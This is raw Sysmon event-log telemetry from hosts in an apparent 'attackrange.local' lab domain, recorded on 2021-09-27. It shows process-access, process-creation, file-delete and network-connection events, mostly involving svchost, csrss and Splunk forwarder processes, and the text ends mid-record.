10341000x8000000000000000982220Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982219Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982218Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982217Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982216Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982215Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982214Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982213Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8EBB-6151-397A-00000000FD01}1232C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982212Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982211Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982210Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8EBB-6151-397A-00000000FD01}1232C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982209Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.039{69CF5F33-8EBB-6151-397A-00000000FD01}1232C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000982208Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.038{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC1F5409D2A909030640033D696EABF5,SHA256=AB735FC366A836499520A3BF0B791553E028727ABB7576F2505CBECE9651C855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:25.593{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.78-58988-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:24.942{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54319-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:28.978{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A87B822FE4EFABF1BED8EDF48E78DCB,SHA256=733B5365BC131EE85AECDF9377579873788D216EBB6FAC37593596A82E4C1AB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:28.337{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF67AA52DF3717BADFC72AC85CE3E2FB,SHA256=46C8A99F70FACD69A9E50CEF530E47E3675C0A52EAE37BB9D2536375E4933491,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982266Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8EBC-6151-3C7A-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982265Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982264Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982263Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982262Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982261Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982260Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982259Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982258Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982257Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982256Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8EBC-6151-3C7A-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982255Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.975{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8EBC-6151-3C7A-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 